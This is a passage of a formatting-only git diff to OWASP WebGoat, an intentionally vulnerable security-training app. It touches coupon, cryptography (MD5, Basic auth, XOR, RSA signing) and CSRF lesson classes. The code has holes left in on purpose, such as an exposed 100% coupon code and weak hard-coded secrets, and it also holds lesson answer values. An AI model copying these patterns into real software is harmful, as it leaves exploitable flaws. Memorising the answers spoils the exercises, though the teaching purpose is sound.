+    codes.add(new CheckoutCode("owasp-webgoat", 50));
+    this.checkoutCodes = new CheckoutCodes(codes);
+  }
+
+  @GetMapping(value = "/coupons/{code}", produces = MediaType.APPLICATION_JSON_VALUE)
+  public CheckoutCode getDiscountCode(@PathVariable String code) {
+    if (ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE.equals(code)) {
+      return new CheckoutCode(ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE, 100);
     }
+    return checkoutCodes.get(code).orElse(new CheckoutCode("no", 0));
+  }
 
-    private CheckoutCodes checkoutCodes;
-
-    public ShopEndpoint() {
-        List<CheckoutCode> codes = Lists.newArrayList();
-        codes.add(new CheckoutCode("webgoat", 25));
-        codes.add(new CheckoutCode("owasp", 25));
-        codes.add(new CheckoutCode("owasp-webgoat", 50));
-        this.checkoutCodes = new CheckoutCodes(codes);
-    }
-
-    @GetMapping(value = "/coupons/{code}", produces = MediaType.APPLICATION_JSON_VALUE)
-    public CheckoutCode getDiscountCode(@PathVariable String code) {
-        if (ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE.equals(code)) {
-            return new CheckoutCode(ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE, 100);
-        }
-        return checkoutCodes.get(code).orElse(new CheckoutCode("no", 0));
-    }
-
-    @GetMapping(value = "/coupons", produces = MediaType.APPLICATION_JSON_VALUE)
-    public CheckoutCodes all() {
-        List<CheckoutCode> all = Lists.newArrayList();
-        all.addAll(this.checkoutCodes.getCodes());
-        all.add(new CheckoutCode(ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE, 100));
-        return new CheckoutCodes(all);
-    }
+  @GetMapping(value = "/coupons", produces = MediaType.APPLICATION_JSON_VALUE)
+  public CheckoutCodes all() {
+    List<CheckoutCode> all = Lists.newArrayList();
+    all.addAll(this.checkoutCodes.getCodes());
+    all.add(new CheckoutCode(ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE, 100));
+    return new CheckoutCodes(all);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/cryptography/CryptoUtil.java b/src/main/java/org/owasp/webgoat/lessons/cryptography/CryptoUtil.java
index d3bf9f2e4..6e13e57e3 100644
--- a/src/main/java/org/owasp/webgoat/lessons/cryptography/CryptoUtil.java
+++ b/src/main/java/org/owasp/webgoat/lessons/cryptography/CryptoUtil.java
@@ -1,8 +1,5 @@
 package org.owasp.webgoat.lessons.cryptography;
 
-import lombok.extern.slf4j.Slf4j;
-
-import javax.xml.bind.DatatypeConverter;
 import java.math.BigInteger;
 import java.nio.charset.Charset;
 import java.security.InvalidAlgorithmParameterException;
@@ -19,117 +16,128 @@ import java.security.spec.InvalidKeySpecException;
 import java.security.spec.PKCS8EncodedKeySpec;
 import java.security.spec.RSAKeyGenParameterSpec;
 import java.util.Base64;
+import javax.xml.bind.DatatypeConverter;
+import lombok.extern.slf4j.Slf4j;
 
 @Slf4j
 public class CryptoUtil {
 
-	private static final BigInteger[] FERMAT_PRIMES = 
-		{	BigInteger.valueOf(3), 
-			BigInteger.valueOf(5), 
-			BigInteger.valueOf(17), 
-			BigInteger.valueOf(257), 
-			BigInteger.valueOf(65537) };
+  private static final BigInteger[] FERMAT_PRIMES = {
+    BigInteger.valueOf(3),
+    BigInteger.valueOf(5),
+    BigInteger.valueOf(17),
+    BigInteger.valueOf(257),
+    BigInteger.valueOf(65537)
+  };
 
-	public static KeyPair generateKeyPair() throws NoSuchAlgorithmException, InvalidAlgorithmParameterException {
-		KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA");
-		RSAKeyGenParameterSpec kpgSpec = new RSAKeyGenParameterSpec(2048, FERMAT_PRIMES[new SecureRandom().nextInt(FERMAT_PRIMES.length)]);
-		keyPairGenerator.initialize(kpgSpec);
-		//keyPairGenerator.initialize(2048);
-        return keyPairGenerator.generateKeyPair();
+  public static KeyPair generateKeyPair()
+      throws NoSuchAlgorithmException, InvalidAlgorithmParameterException {
+    KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA");
+    RSAKeyGenParameterSpec kpgSpec =
+        new RSAKeyGenParameterSpec(
+            2048, FERMAT_PRIMES[new SecureRandom().nextInt(FERMAT_PRIMES.length)]);
+    keyPairGenerator.initialize(kpgSpec);
+    // keyPairGenerator.initialize(2048);
+    return keyPairGenerator.generateKeyPair();
+  }
+
+  public static String getPrivateKeyInPEM(KeyPair keyPair) {
+    String encodedString = "-----BEGIN PRIVATE KEY-----\n";
+    encodedString =
+        encodedString
+            + new String(
+                Base64.getEncoder().encode(keyPair.getPrivate().getEncoded()),
+                Charset.forName("UTF-8"))
+            + "\n";
+    encodedString = encodedString + "-----END PRIVATE KEY-----\n";
+    return encodedString;
+  }
+
+  public static String signMessage(String message, PrivateKey privateKey) {
+
+    log.debug("start signMessage");
+    String signature = null;
+
+    try {
+      // Initiate signature verification
+      Signature instance = Signature.getInstance("SHA256withRSA");
+      instance.initSign(privateKey);
+      instance.update(message.getBytes("UTF-8"));
+
+      // actual verification against signature
+      signature = new String(Base64.getEncoder().encode(instance.sign()), Charset.forName("UTF-8"));
+
+      log.info("signe the signature with result: {}", signature);
+    } catch (Exception e) {
+      log.error("Signature signing failed", e);
     }
 
-    public static String getPrivateKeyInPEM(KeyPair keyPair) {
-        String encodedString = "-----BEGIN PRIVATE KEY-----\n";
-        encodedString = encodedString+new String(Base64.getEncoder().encode(keyPair.getPrivate().getEncoded()),Charset.forName("UTF-8"))+"\n";
-        encodedString = encodedString+"-----END PRIVATE KEY-----\n";
-        return encodedString;
+    log.debug("end signMessage");
+    return signature;
+  }
+
+  public static boolean verifyMessage(
+      String message, String base64EncSignature, PublicKey publicKey) {
+
+    log.debug("start verifyMessage");
+    boolean result = false;
+
+    try {
+
+      base64EncSignature = base64EncSignature.replace("\r", "").replace("\n", "").replace(" ", "");
+      // get raw signature from base64 encrypted string in header
+      byte[] decodedSignature = Base64.getDecoder().decode(base64EncSignature);
+
+      // Initiate signature verification
+      Signature instance = Signature.getInstance("SHA256withRSA");
+      instance.initVerify(publicKey);
+      instance.update(message.getBytes("UTF-8"));
+
+      // actual verification against signature
+      result = instance.verify(decodedSignature);
+
+      log.info("Verified the signature with result: {}", result);
+    } catch (Exception e) {
+      log.error("Signature verification failed", e);
     }
 
-    public static String signMessage(String message, PrivateKey privateKey) {
+    log.debug("end verifyMessage");
+    return result;
+  }
 
-        log.debug("start signMessage");
-        String signature = null;
-		
-		try {
-			//Initiate signature verification
-			Signature instance = Signature.getInstance("SHA256withRSA");
-			instance.initSign(privateKey);
-            instance.update(message.getBytes("UTF-8"));
-            
-            //actual verification against signature
-			signature = new String(Base64.getEncoder().encode(instance.sign()), Charset.forName("UTF-8"));
+  public static boolean verifyAssignment(String modulus, String signature, PublicKey publicKey) {
 
-			log.info("signe the signature with result: {}", signature);
-		} catch (Exception e) {
-			log.error("Signature signing failed", e);
-		}
+    /* first check if the signature is correct, i.e. right private key and right hash */
+    boolean result = false;
 
-		log.debug("end signMessage");
-		return signature;
-	}
-    
-    public static boolean verifyMessage(String message, String base64EncSignature,
-			PublicKey publicKey) {
+    if (modulus != null && signature != null) {
+      result = verifyMessage(modulus, signature, publicKey);
 
-		log.debug("start verifyMessage");
-		boolean result = false;
-		
-		try {
-			
-			base64EncSignature = base64EncSignature.replace("\r", "").replace("\n", "")
-					.replace(" ", "");
-			//get raw signature from base64 encrypted string in header
-			byte[] decodedSignature = Base64.getDecoder().decode(base64EncSignature);
-			
-			//Initiate signature verification
-			Signature instance = Signature.getInstance("SHA256withRSA");
-			instance.initVerify(publicKey);
-            instance.update(message.getBytes("UTF-8"));
-            
-            //actual verification against signature
-			result = instance.verify(decodedSignature);
+      /*
+       * next check if the submitted modulus is the correct modulus of the public key
+       */
+      RSAPublicKey rsaPubKey = (RSAPublicKey) publicKey;
+      if (modulus.length() == 512) {
+        modulus = "00".concat(modulus);
+      }
+      result =
+          result
+              && (DatatypeConverter.printHexBinary(rsaPubKey.getModulus().toByteArray())
+                  .equals(modulus.toUpperCase()));
+    }
+    return result;
+  }
 
-			log.info("Verified the signature with result: {}", result);
-		} catch (Exception e) {
-			log.error("Signature verification failed", e);
-		}
+  public static PrivateKey getPrivateKeyFromPEM(String privateKeyPem)
+      throws NoSuchAlgorithmException, InvalidKeySpecException {
+    privateKeyPem = privateKeyPem.replace("-----BEGIN PRIVATE KEY-----", "");
+    privateKeyPem = privateKeyPem.replace("-----END PRIVATE KEY-----", "");
+    privateKeyPem = privateKeyPem.replace("\n", "").replace("\r", "");
 
-		log.debug("end verifyMessage");
-		return result;
-	}
-
-	public static boolean verifyAssignment(String modulus, String signature, PublicKey publicKey) {
-
-		/* first check if the signature is correct, i.e. right private key and right hash */
-		boolean result = false;
-		
-		if (modulus != null && signature != null) {
-			result = verifyMessage(modulus, signature, publicKey);
-
-			/*
-			 * next check if the submitted modulus is the correct modulus of the public key
-			 */
-			RSAPublicKey rsaPubKey = (RSAPublicKey) publicKey;
-			if (modulus.length()==512) {
-				modulus = "00".concat(modulus);
-			}
-			result = result && (DatatypeConverter.printHexBinary(rsaPubKey.getModulus().toByteArray()).equals(modulus.toUpperCase()));
-		}
-		return result;
-
-	}
-
-	public static PrivateKey getPrivateKeyFromPEM(String privateKeyPem) throws NoSuchAlgorithmException, InvalidKeySpecException {
-		privateKeyPem = privateKeyPem.replace("-----BEGIN PRIVATE KEY-----", "");
-		privateKeyPem = privateKeyPem.replace("-----END PRIVATE KEY-----", "");
-		privateKeyPem = privateKeyPem.replace("\n", "").replace("\r", "");
-		
-
-      	byte [] decoded = Base64.getDecoder().decode(privateKeyPem);
-
-      	PKCS8EncodedKeySpec spec = new PKCS8EncodedKeySpec(decoded);
-      	KeyFactory kf = KeyFactory.getInstance("RSA");
-      	return kf.generatePrivate(spec);
-	}
+    byte[] decoded = Base64.getDecoder().decode(privateKeyPem);
 
+    PKCS8EncodedKeySpec spec = new PKCS8EncodedKeySpec(decoded);
+    KeyFactory kf = KeyFactory.getInstance("RSA");
+    return kf.generatePrivate(spec);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/cryptography/Cryptography.java b/src/main/java/org/owasp/webgoat/lessons/cryptography/Cryptography.java
index 6a805df21..5e00a3f5e 100644
--- a/src/main/java/org/owasp/webgoat/lessons/cryptography/Cryptography.java
+++ b/src/main/java/org/owasp/webgoat/lessons/cryptography/Cryptography.java
@@ -28,14 +28,13 @@ import org.springframework.stereotype.Component;
 
 @Component
 public class Cryptography extends Lesson {
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A2;
-    }
-
-    @Override
-    public String getTitle() {
-        return "6.crypto.title";//first lesson in general
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A2;
+  }
 
+  @Override
+  public String getTitle() {
+    return "6.crypto.title"; // first lesson in general
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/cryptography/EncodingAssignment.java b/src/main/java/org/owasp/webgoat/lessons/cryptography/EncodingAssignment.java
index 41d2d6421..65c115c41 100644
--- a/src/main/java/org/owasp/webgoat/lessons/cryptography/EncodingAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/cryptography/EncodingAssignment.java
@@ -22,6 +22,9 @@
 
 package org.owasp.webgoat.lessons.cryptography;
 
+import java.util.Base64;
+import java.util.Random;
+import javax.servlet.http.HttpServletRequest;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.http.MediaType;
@@ -31,43 +34,42 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.servlet.http.HttpServletRequest;
-import java.util.Base64;
-import java.util.Random;
-
 @RestController
 public class EncodingAssignment extends AssignmentEndpoint {
 
-	public static String getBasicAuth(String username, String password) {
-    	return Base64.getEncoder().encodeToString(username.concat(":").concat(password).getBytes());
+  public static String getBasicAuth(String username, String password) {
+    return Base64.getEncoder().encodeToString(username.concat(":").concat(password).getBytes());
+  }
+
+  @GetMapping(path = "/crypto/encoding/basic", produces = MediaType.TEXT_HTML_VALUE)
+  @ResponseBody
+  public String getBasicAuth(HttpServletRequest request) {
+
+    String basicAuth = (String) request.getSession().getAttribute("basicAuth");
+    String username = request.getUserPrincipal().getName();
+    if (basicAuth == null) {
+      String password =
+          HashingAssignment.SECRETS[new Random().nextInt(HashingAssignment.SECRETS.length)];
+      basicAuth = getBasicAuth(username, password);
+      request.getSession().setAttribute("basicAuth", basicAuth);
     }
-	
-	@GetMapping(path="/crypto/encoding/basic",produces=MediaType.TEXT_HTML_VALUE)
-    @ResponseBody
-    public String getBasicAuth(HttpServletRequest request) {
-		
-		String basicAuth = (String) request.getSession().getAttribute("basicAuth");
-		String username = request.getUserPrincipal().getName();
-		if (basicAuth == null) {
-			String password = HashingAssignment.SECRETS[new Random().nextInt(HashingAssignment.SECRETS.length)];
-			basicAuth = getBasicAuth(username, password);
-			request.getSession().setAttribute("basicAuth", basicAuth);
-		}
-		return "Authorization: Basic ".concat(basicAuth);
-    }
-	
-    @PostMapping("/crypto/encoding/basic-auth")
-    @ResponseBody
-    public AttackResult completed(HttpServletRequest request, @RequestParam String answer_user, @RequestParam String answer_pwd) {
-    	String basicAuth = (String) request.getSession().getAttribute("basicAuth");
-    	if (basicAuth !=null && answer_user!=null && answer_pwd !=null 
-        		&& basicAuth.equals(getBasicAuth(answer_user,answer_pwd))) 
-        {
-            return success(this)
-                .feedback("crypto-encoding.success")
-                .build();
-        } else {
-            return failed(this).feedback("crypto-encoding.empty").build();
-        }
+    return "Authorization: Basic ".concat(basicAuth);
+  }
+
+  @PostMapping("/crypto/encoding/basic-auth")
+  @ResponseBody
+  public AttackResult completed(
+      HttpServletRequest request,
+      @RequestParam String answer_user,
+      @RequestParam String answer_pwd) {
+    String basicAuth = (String) request.getSession().getAttribute("basicAuth");
+    if (basicAuth != null
+        && answer_user != null
+        && answer_pwd != null
+        && basicAuth.equals(getBasicAuth(answer_user, answer_pwd))) {
+      return success(this).feedback("crypto-encoding.success").build();
+    } else {
+      return failed(this).feedback("crypto-encoding.empty").build();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/cryptography/HashingAssignment.java b/src/main/java/org/owasp/webgoat/lessons/cryptography/HashingAssignment.java
index 89cc05262..b83f931a8 100644
--- a/src/main/java/org/owasp/webgoat/lessons/cryptography/HashingAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/cryptography/HashingAssignment.java
@@ -22,6 +22,11 @@
 
 package org.owasp.webgoat.lessons.cryptography;
 
+import java.security.MessageDigest;
+import java.security.NoSuchAlgorithmException;
+import java.util.Random;
+import javax.servlet.http.HttpServletRequest;
+import javax.xml.bind.DatatypeConverter;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -32,79 +37,69 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.servlet.http.HttpServletRequest;
-import javax.xml.bind.DatatypeConverter;
-import java.security.MessageDigest;
-import java.security.NoSuchAlgorithmException;
-import java.util.Random;
-
 @RestController
-@AssignmentHints({"crypto-hashing.hints.1","crypto-hashing.hints.2"})
+@AssignmentHints({"crypto-hashing.hints.1", "crypto-hashing.hints.2"})
 public class HashingAssignment extends AssignmentEndpoint {
-	
-	public static final String[] SECRETS = {"secret","admin","password", "123456", "passw0rd"};
 
-	@RequestMapping(path="/crypto/hashing/md5",produces=MediaType.TEXT_HTML_VALUE)
-    @ResponseBody
-    public String getMd5(HttpServletRequest request) throws NoSuchAlgorithmException {
-		
-		String md5Hash = (String) request.getSession().getAttribute("md5Hash");
-		if (md5Hash == null) {
-			
-			String secret = SECRETS[new Random().nextInt(SECRETS.length)];
-	         
-		    MessageDigest md = MessageDigest.getInstance("MD5");
-		    md.update(secret.getBytes());
-		    byte[] digest = md.digest();
-		    md5Hash = DatatypeConverter
-		      .printHexBinary(digest).toUpperCase();
-			request.getSession().setAttribute("md5Hash", md5Hash);
-			request.getSession().setAttribute("md5Secret", secret);
-		}
-		return md5Hash;
+  public static final String[] SECRETS = {"secret", "admin", "password", "123456", "passw0rd"};
+
+  @RequestMapping(path = "/crypto/hashing/md5", produces = MediaType.TEXT_HTML_VALUE)
+  @ResponseBody
+  public String getMd5(HttpServletRequest request) throws NoSuchAlgorithmException {
+
+    String md5Hash = (String) request.getSession().getAttribute("md5Hash");
+    if (md5Hash == null) {
+
+      String secret = SECRETS[new Random().nextInt(SECRETS.length)];
+
+      MessageDigest md = MessageDigest.getInstance("MD5");
+      md.update(secret.getBytes());
+      byte[] digest = md.digest();
+      md5Hash = DatatypeConverter.printHexBinary(digest).toUpperCase();
+      request.getSession().setAttribute("md5Hash", md5Hash);
+      request.getSession().setAttribute("md5Secret", secret);
     }
-	
-	@RequestMapping(path="/crypto/hashing/sha256",produces=MediaType.TEXT_HTML_VALUE)
-    @ResponseBody
-    public String getSha256(HttpServletRequest request) throws NoSuchAlgorithmException {
-		
-		String sha256 = (String) request.getSession().getAttribute("sha256");
-		if (sha256 == null) {
-			String secret = SECRETS[new Random().nextInt(SECRETS.length)];
-		    sha256 = getHash(secret, "SHA-256");
-			request.getSession().setAttribute("sha256Hash", sha256);
-			request.getSession().setAttribute("sha256Secret", secret);
-		}
-		return sha256;
+    return md5Hash;
+  }
+
+  @RequestMapping(path = "/crypto/hashing/sha256", produces = MediaType.TEXT_HTML_VALUE)
+  @ResponseBody
+  public String getSha256(HttpServletRequest request) throws NoSuchAlgorithmException {
+
+    String sha256 = (String) request.getSession().getAttribute("sha256");
+    if (sha256 == null) {
+      String secret = SECRETS[new Random().nextInt(SECRETS.length)];
+      sha256 = getHash(secret, "SHA-256");
+      request.getSession().setAttribute("sha256Hash", sha256);
+      request.getSession().setAttribute("sha256Secret", secret);
     }
-	
-    @PostMapping("/crypto/hashing")
-    @ResponseBody
-    public AttackResult completed(HttpServletRequest request, @RequestParam String answer_pwd1, @RequestParam String answer_pwd2) {
-        
-    	String md5Secret = (String) request.getSession().getAttribute("md5Secret");
-    	String sha256Secret = (String) request.getSession().getAttribute("sha256Secret");
-    	
-    	if (answer_pwd1!=null && answer_pwd2 !=null) {
-        	if (answer_pwd1.equals(md5Secret)
-        		&& answer_pwd2.equals(sha256Secret)) {
-        		return success(this)
-        				.feedback("crypto-hashing.success")
-        				.build();
-        	} else if (answer_pwd1.equals(md5Secret)
-            		|| answer_pwd2.equals(sha256Secret)) {
-        		return failed(this).feedback("crypto-hashing.oneok").build();
-        	} 
-        } 
-        return failed(this).feedback("crypto-hashing.empty").build(); 
+    return sha256;
+  }
+
+  @PostMapping("/crypto/hashing")
+  @ResponseBody
+  public AttackResult completed(
+      HttpServletRequest request,
+      @RequestParam String answer_pwd1,
+      @RequestParam String answer_pwd2) {
+
+    String md5Secret = (String) request.getSession().getAttribute("md5Secret");
+    String sha256Secret = (String) request.getSession().getAttribute("sha256Secret");
+
+    if (answer_pwd1 != null && answer_pwd2 != null) {
+      if (answer_pwd1.equals(md5Secret) && answer_pwd2.equals(sha256Secret)) {
+        return success(this).feedback("crypto-hashing.success").build();
+      } else if (answer_pwd1.equals(md5Secret) || answer_pwd2.equals(sha256Secret)) {
+        return failed(this).feedback("crypto-hashing.oneok").build();
+      }
     }
-    
-    public static String getHash(String secret, String algorithm) throws NoSuchAlgorithmException {
-    	MessageDigest md = MessageDigest.getInstance(algorithm);
-	    md.update(secret.getBytes());
-	    byte[] digest = md.digest();
-	    return DatatypeConverter
-	      .printHexBinary(digest).toUpperCase();
-    }
-    
+    return failed(this).feedback("crypto-hashing.empty").build();
+  }
+
+  public static String getHash(String secret, String algorithm) throws NoSuchAlgorithmException {
+    MessageDigest md = MessageDigest.getInstance(algorithm);
+    md.update(secret.getBytes());
+    byte[] digest = md.digest();
+    return DatatypeConverter.printHexBinary(digest).toUpperCase();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/cryptography/SecureDefaultsAssignment.java b/src/main/java/org/owasp/webgoat/lessons/cryptography/SecureDefaultsAssignment.java
index 90435e503..bb28f4202 100644
--- a/src/main/java/org/owasp/webgoat/lessons/cryptography/SecureDefaultsAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/cryptography/SecureDefaultsAssignment.java
@@ -22,6 +22,7 @@
 
 package org.owasp.webgoat.lessons.cryptography;
 
+import java.security.NoSuchAlgorithmException;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -30,24 +31,29 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.security.NoSuchAlgorithmException;
-
 @RestController
-@AssignmentHints({"crypto-secure-defaults.hints.1", "crypto-secure-defaults.hints.2", "crypto-secure-defaults.hints.3"})
+@AssignmentHints({
+  "crypto-secure-defaults.hints.1",
+  "crypto-secure-defaults.hints.2",
+  "crypto-secure-defaults.hints.3"
+})
 public class SecureDefaultsAssignment extends AssignmentEndpoint {
 
-    @PostMapping("/crypto/secure/defaults")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String secretFileName,  @RequestParam String secretText) throws NoSuchAlgorithmException {
-        if (secretFileName!=null && secretFileName.equals("default_secret")) {
-        	if (secretText!=null && HashingAssignment.getHash(secretText, "SHA-256").equalsIgnoreCase("34de66e5caf2cb69ff2bebdc1f3091ecf6296852446c718e38ebfa60e4aa75d2")) {
-        		return success(this)
-        				.feedback("crypto-secure-defaults.success")
-        				.build();
-        	} else {
-        		return failed(this).feedback("crypto-secure-defaults.messagenotok").build(); 
-        	}
-        } 
-        return failed(this).feedback("crypto-secure-defaults.notok").build(); 
+  @PostMapping("/crypto/secure/defaults")
+  @ResponseBody
+  public AttackResult completed(
+      @RequestParam String secretFileName, @RequestParam String secretText)
+      throws NoSuchAlgorithmException {
+    if (secretFileName != null && secretFileName.equals("default_secret")) {
+      if (secretText != null
+          && HashingAssignment.getHash(secretText, "SHA-256")
+              .equalsIgnoreCase(
+                  "34de66e5caf2cb69ff2bebdc1f3091ecf6296852446c718e38ebfa60e4aa75d2")) {
+        return success(this).feedback("crypto-secure-defaults.success").build();
+      } else {
+        return failed(this).feedback("crypto-secure-defaults.messagenotok").build();
+      }
     }
+    return failed(this).feedback("crypto-secure-defaults.notok").build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/cryptography/SigningAssignment.java b/src/main/java/org/owasp/webgoat/lessons/cryptography/SigningAssignment.java
index 40a910522..382ee3b16 100644
--- a/src/main/java/org/owasp/webgoat/lessons/cryptography/SigningAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/cryptography/SigningAssignment.java
@@ -22,6 +22,12 @@
 
 package org.owasp.webgoat.lessons.cryptography;
 
+import java.security.InvalidAlgorithmParameterException;
+import java.security.KeyPair;
+import java.security.NoSuchAlgorithmException;
+import java.security.interfaces.RSAPublicKey;
+import javax.servlet.http.HttpServletRequest;
+import javax.xml.bind.DatatypeConverter;
 import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
@@ -33,54 +39,54 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.servlet.http.HttpServletRequest;
-import javax.xml.bind.DatatypeConverter;
-import java.security.InvalidAlgorithmParameterException;
-import java.security.KeyPair;
-import java.security.NoSuchAlgorithmException;
-import java.security.interfaces.RSAPublicKey;
-
 @RestController
-@AssignmentHints({"crypto-signing.hints.1","crypto-signing.hints.2", "crypto-signing.hints.3", "crypto-signing.hints.4"})
+@AssignmentHints({
+  "crypto-signing.hints.1",
+  "crypto-signing.hints.2",
+  "crypto-signing.hints.3",
+  "crypto-signing.hints.4"
+})
 @Slf4j
 public class SigningAssignment extends AssignmentEndpoint {
-	
-	@RequestMapping(path="/crypto/signing/getprivate",produces=MediaType.TEXT_HTML_VALUE)
-    @ResponseBody
-    public String getPrivateKey(HttpServletRequest request) throws NoSuchAlgorithmException, InvalidAlgorithmParameterException {
-		
-		String privateKey = (String) request.getSession().getAttribute("privateKeyString");
-		if (privateKey == null) {			
-			KeyPair keyPair = CryptoUtil.generateKeyPair();
-			privateKey = CryptoUtil.getPrivateKeyInPEM(keyPair);
-			request.getSession().setAttribute("privateKeyString", privateKey);
-			request.getSession().setAttribute("keyPair", keyPair);
-		}
-		return privateKey;
+
+  @RequestMapping(path = "/crypto/signing/getprivate", produces = MediaType.TEXT_HTML_VALUE)
+  @ResponseBody
+  public String getPrivateKey(HttpServletRequest request)
+      throws NoSuchAlgorithmException, InvalidAlgorithmParameterException {
+
+    String privateKey = (String) request.getSession().getAttribute("privateKeyString");
+    if (privateKey == null) {
+      KeyPair keyPair = CryptoUtil.generateKeyPair();
+      privateKey = CryptoUtil.getPrivateKeyInPEM(keyPair);
+      request.getSession().setAttribute("privateKeyString", privateKey);
+      request.getSession().setAttribute("keyPair", keyPair);
     }
-	
-    @PostMapping("/crypto/signing/verify")
-    @ResponseBody
-    public AttackResult completed(HttpServletRequest request, @RequestParam String modulus, @RequestParam String signature) {
-		
-		String tempModulus = modulus;/* used to validate the modulus of the public key but might need to be corrected */
-    	KeyPair keyPair = (KeyPair) request.getSession().getAttribute("keyPair");
-		RSAPublicKey rsaPubKey = (RSAPublicKey) keyPair.getPublic();
-		if (tempModulus.length() == 512) {
-			tempModulus = "00".concat(tempModulus);
-		}
-		if (!DatatypeConverter.printHexBinary(rsaPubKey.getModulus().toByteArray()).equals(tempModulus.toUpperCase())) {
-			log.warn("modulus {} incorrect", modulus);
-			return failed(this).feedback("crypto-signing.modulusnotok").build();
-		}
-		/* orginal modulus must be used otherwise the signature would be invalid */
-		if (CryptoUtil.verifyMessage(modulus, signature, keyPair.getPublic())) {
-			return success(this).feedback("crypto-signing.success").build();
-		} else {
-			log.warn("signature incorrect");
-			return failed(this).feedback("crypto-signing.notok").build();
-		}
-       
+    return privateKey;
+  }
+
+  @PostMapping("/crypto/signing/verify")
+  @ResponseBody
+  public AttackResult completed(
+      HttpServletRequest request, @RequestParam String modulus, @RequestParam String signature) {
+
+    String tempModulus =
+        modulus; /* used to validate the modulus of the public key but might need to be corrected */
+    KeyPair keyPair = (KeyPair) request.getSession().getAttribute("keyPair");
+    RSAPublicKey rsaPubKey = (RSAPublicKey) keyPair.getPublic();
+    if (tempModulus.length() == 512) {
+      tempModulus = "00".concat(tempModulus);
     }
-    
+    if (!DatatypeConverter.printHexBinary(rsaPubKey.getModulus().toByteArray())
+        .equals(tempModulus.toUpperCase())) {
+      log.warn("modulus {} incorrect", modulus);
+      return failed(this).feedback("crypto-signing.modulusnotok").build();
+    }
+    /* orginal modulus must be used otherwise the signature would be invalid */
+    if (CryptoUtil.verifyMessage(modulus, signature, keyPair.getPublic())) {
+      return success(this).feedback("crypto-signing.success").build();
+    } else {
+      log.warn("signature incorrect");
+      return failed(this).feedback("crypto-signing.notok").build();
+    }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/cryptography/XOREncodingAssignment.java b/src/main/java/org/owasp/webgoat/lessons/cryptography/XOREncodingAssignment.java
index 68a8be8b5..d7e3ed94d 100644
--- a/src/main/java/org/owasp/webgoat/lessons/cryptography/XOREncodingAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/cryptography/XOREncodingAssignment.java
@@ -34,14 +34,12 @@ import org.springframework.web.bind.annotation.RestController;
 @AssignmentHints({"crypto-encoding-xor.hints.1"})
 public class XOREncodingAssignment extends AssignmentEndpoint {
 
-    @PostMapping("/crypto/encoding/xor")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String answer_pwd1) {
-        if (answer_pwd1!=null && answer_pwd1.equals("databasepassword")) {
-        	return success(this)
-        				.feedback("crypto-encoding-xor.success")
-        				.build();
-        } 
-        return failed(this).feedback("crypto-encoding-xor.empty").build(); 
+  @PostMapping("/crypto/encoding/xor")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String answer_pwd1) {
+    if (answer_pwd1 != null && answer_pwd1.equals("databasepassword")) {
+      return success(this).feedback("crypto-encoding-xor.success").build();
     }
+    return failed(this).feedback("crypto-encoding-xor.empty").build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRF.java b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRF.java
index 624797f66..73fa55bda 100644
--- a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRF.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRF.java
@@ -26,16 +26,16 @@ import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
-/**
- * Created by jason on 9/29/17.
- */
+/** Created by jason on 9/29/17. */
 @Component
 public class CSRF extends Lesson {
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A10;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A10;
+  }
 
-    @Override
-    public String getTitle() { return "csrf.title"; }
+  @Override
+  public String getTitle() {
+    return "csrf.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFConfirmFlag1.java b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFConfirmFlag1.java
index ba012e56e..e4f52eb09 100644
